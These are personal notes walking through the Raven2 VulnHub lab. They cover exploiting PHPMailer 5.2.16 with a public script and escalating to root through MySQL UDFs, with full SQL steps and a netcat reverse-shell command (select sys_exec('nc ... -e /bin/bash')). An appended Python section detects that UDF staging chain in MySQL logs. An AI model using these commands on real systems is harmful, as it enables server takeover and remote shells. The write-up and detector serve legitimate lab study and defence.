Raven2 of vulnhub
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Personal study notes only.
I. Host discovery

II. Port scanning

III. Service version detection
Ports 22 and 80 are the routine ones.
Port 111 is one I do not recognise.
Port 42689 is an open remote procedure call (RPC) service.

IV. Information gathering
1. The page keeps requesting resources
As with the original Raven, the page requests resources from some foreign sites, so it does not load normally; just route it through a proxy. If you are using Burp, chain it through a second proxy layer.
The site is a security company's website.

2. Routine source review
Looked at the page for leaked source code and for hidden directories; found nothing.
V. Directory scanning
The most basic finding: the site is built on WordPress.

1. /vendor
Files 3, 4 and 5 in the listing all mention PHPMailer. The readme introduces PHPMailer as a PHP mail-transport class, the security file lists its historical vulnerabilities, and the changelog records the changes.
Try to break in through PHPMailer.

(1) flag1

VI. PHPMailer
From the files above we know the version is 5.2.16, so try the exploits listed for it.
1. 40974.py
40974.py works: it writes a reverse-shell file to the target path.

Note: you need to edit the script before using it:
(1) the reverse-connection address
(2) the path where the backdoor file is written
(3) the target IP
You can also change the file name.

2. Access the file to trigger it
3. Reverse shell
VII. MySQL UDF privilege escalation
During information gathering we found a leaked MySQL account and password,
and when checking processes we found that MySQL runs as root, so we can escalate privileges through MySQL.
1. Information gathering
root [email protected]

2. UDF privilege escalation
UDFs (user-defined functions) were designed to let users define their own functions so that complex data is easier to query; at the same time they open up the possibility of privilege escalation.
An attacker writes a udf.dll (or .so) that calls cmd or a shell, places it in the designated plugin directory, and creates a custom function that points at it; a query in the database is then equivalent to executing a command in cmd or a shell.
3. Steps
(1) Find the UDF privilege-escalation shared library (.so) that ships with Kali.

(2) Transfer the 64-bit .so to the target.
Best to place it under /tmp.
(3) Check the plugin path
show variables like '%plugin%';
(4) Load the shared library into the database
Using the system database, create a table and insert the library file's bytes into it.
use mysql;
create table a(line blob);
insert into a values(load_file('/tmp/x.so'));
(5) Write the library out to the plugin directory
select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';
(6) Create a new function
create function sys_exec returns integer soname 'x.so';
(7) Execute the reverse shell
select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');

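The defender's counterpart to the steps above, added here and not part of the original post: a scan of a MySQL general query log for the UDF staging chain (read a .so with load_file, dump it into the plugin directory, create a function with soname, call sys_exec). The log lines are constructed; the plugin path /usr/lib/mysql/plugin is taken from the steps above.

```python
import re
from collections import defaultdict

# Constructed sample of a MySQL general query log (FILE output format); not from the
# original post. The statements mirror the UDF staging sequence described above.
SAMPLE_GENERAL_LOG = """\
2022-07-03T03:47:01.000001Z\t   12 Connect\troot@localhost on  using Socket
2022-07-03T03:47:02.000002Z\t   12 Query\tshow variables like '%plugin%'
2022-07-03T03:47:03.000003Z\t   12 Query\tuse mysql
2022-07-03T03:47:04.000004Z\t   12 Query\tcreate table a(line blob)
2022-07-03T03:47:05.000005Z\t   12 Query\tinsert into a values(load_file('/tmp/x.so'))
2022-07-03T03:47:06.000006Z\t   12 Query\tselect * from a into dumpfile '/usr/lib/mysql/plugin/x.so'
2022-07-03T03:47:07.000007Z\t   12 Query\tcreate function sys_exec returns integer soname 'x.so'
2022-07-03T03:47:08.000008Z\t   12 Query\tselect sys_exec('id')
2022-07-03T03:47:09.000009Z\t   13 Query\tselect post_title from wp_posts where id = 4
"""

# One rule per staging step; a connection is only interesting once several line up.
UDF_STAGING_RULES = [
    ("read_shared_object", re.compile(r"load_file\s*\(\s*'[^']*\.(so|dll)'", re.I)),
    ("write_to_plugin_dir", re.compile(r"into\s+(dump|out)file\s+'[^']*(/plugin/|\.(so|dll))", re.I)),
    ("create_udf", re.compile(r"create\s+(or\s+replace\s+)?(aggregate\s+)?function\s+\w+\s+returns\s+\w+\s+soname", re.I)),
    ("call_exec_udf", re.compile(r"\bsys_(exec|eval)\s*\(", re.I)),
]
# General log line layout: <timestamp> <connection id> <command> <argument>
LOG_LINE = re.compile(r"^\S+\s+(\d+)\s+(\w+)\s+(.*)$")


def scan_general_log(log_text):
    """Map connection id -> [(rule name, statement)] for every Query line that
    matches a staging rule, in the order the statements were logged."""
    hits = defaultdict(list)
    for raw in log_text.splitlines():
        m = LOG_LINE.match(raw)
        if not m or m.group(2).lower() != "query":
            continue
        conn_id, statement = int(m.group(1)), m.group(3).strip()
        for name, pattern in UDF_STAGING_RULES:
            if pattern.search(statement):
                hits[conn_id].append((name, statement))
                break  # one rule per statement is enough
    return dict(hits)


def staged_udf_connections(log_text, min_steps=3):
    """Connection ids that completed at least min_steps distinct staging steps.
    A lone load_file() is common noise; the chain is the signal."""
    return sorted(cid for cid, found in scan_general_log(log_text).items()
                  if len({name for name, _ in found}) >= min_steps)
```

Enabling the general log costs disk and I/O; the same rules can be applied to audit-plugin output or to mysql.func rows, where a surviving sys_exec entry after a reboot is the durable indicator.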